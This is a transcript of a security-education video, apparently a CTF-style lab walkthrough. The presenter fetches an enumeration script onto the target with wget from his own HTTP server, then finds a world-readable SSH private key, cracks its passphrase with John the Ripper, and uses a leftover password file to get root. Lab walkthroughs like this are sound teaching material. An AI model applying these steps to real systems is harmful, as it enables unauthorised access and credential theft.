Hey YouTubers, welcome back to the Cyber Overwatch channel. I am Pragmatic1, and in part 2 of the simple security assessment video, I will briefly cover enumeration and privilege escalation. A link to part 1 will be available at the end of this video. If you find this content informative and you are interested in cybersecurity, don't forget to like and subscribe to the Cyber Overwatch channel. You can find more content on www.cybersec.com. In the previous video, I performed reconnaissance to discover my target. I performed a port scan to get an idea of what ports were open and what services were running. I further investigated SMB and HTTP with enum for Linux and FUF, which allowed me to gather some pertinent information. With that information, I was able to brute force a user account and log in via SSH. I'm currently logged in as the user Jan. To get a general idea of what I'm working with, I'm going to run linps. Linp stands for Linux Privilege Escalation Awesome Script. It's a great post-exploitation enumeration script for finding privilege escalation paths. It provides way too much information to go over in this video. Since linps is not on the target, I will have to upload it. One easy way is to run http.server from my system. I have the command shown on my CLI. Since linps is not on the target, I will have to upload it. One of the easy ways to do that is to run http.server on my system. You can see that it's running now. To download linps, all I needed to do was run the following command: wget http://myip:8080/linps.sh, and it downloaded it to the temp folder. If I perform an ls, we can see that linps is now in the temp folder. To run linps, you can simply type ./linps.sh as long as you are in the same directory as the script. There are other parameters available, and I'd highly recommend going to the ps-ng GitHub to learn more. I executed the linps script. It will take some time to run, so I will pause the video until it completes. Linps provides a lot of information to parse through. Info includes a legend to better understand the formatting and basic information about the host. Linps also shows possible vulnerabilities the host may be vulnerable to based on the detected installed versions. It includes associated CVEs and URLs that allow you to research the vulnerability, just to name a few things. This is just the tip of the iceberg, the amount of information that linps provides. Looking through the output, I see an ID_RSA file in the .ssh directory for the user K. That will be something interesting to look at if the J account has permissions to access K's .ssh directory. I was able to access the user K's .ssh directory. After running the ls-la command, I can see everyone has read permissions to that ID_RSA file. Let's see what happens if I try to authenticate using the SSH key. I'm using the following command as shown on the CLI. So I'm typing in yes, and I get prompted for a password. I currently don't have the password, so I'm not going to be able to log in with the K account. Since I was able to read the ID_RSA file, I might be able to crack the password. I will try to crack the password with John the Ripper. John the Ripper is a password cracking tool that has been around since 1996. Using the Jan account, I performed a cat ID_RSA to read the contents. I copied the contents of the ID_RSA file and saved it to my system as K_ID_RSA. In order to crack the SSH key with John the Ripper, I'll need to convert it to a format that John understands. I will run the following command shown in the CLI, which puts the SSH key contents in a format that John can understand. SSH to John completed, and the output of the contents are in a file called hash.txt, as shown in the downloads folder. When I open the hash.txt file, you can see the format looks more like a password hash. Now that I have the SSH key in a format that John the Ripper can crack, I'll run the following command shown in the CLI. John the Ripper completed cracking the password. It looks like K's password is beeswax. Let's see if we can log in with K's password via SSH. I'm using the command ssh-i k_id_rsa space k at the host IP. I get prompted for a password, so it looks like beeswax worked. Let's see what else I can find. Typing ls-la, I'm able to see a file called pass.back that K is an owner of. That file looks interesting. I do a cat pass.back and can see what looks like a very long password. I'll try sudo su and see if the password works. So it looks like the password gave me root. Thank you for watching this video on the Cyber Overwatch channel. In this video, I continued where I left off from the first video. I was able to get on the target with the Jan account. I performed enumeration to get more insight on the host. I was able to locate and brute force the SSH key for the K account. I located a file containing a password with root privileges that allowed me to escalate to root. I hope you found this video informative and enjoyable. Don't forget to like and subscribe. If you have any questions, please feel free to leave a comment or contact me on the cybersec.com site. Until next time, keep learning. The only way to keep improving is to keep learning. Pragmatic1 signing off.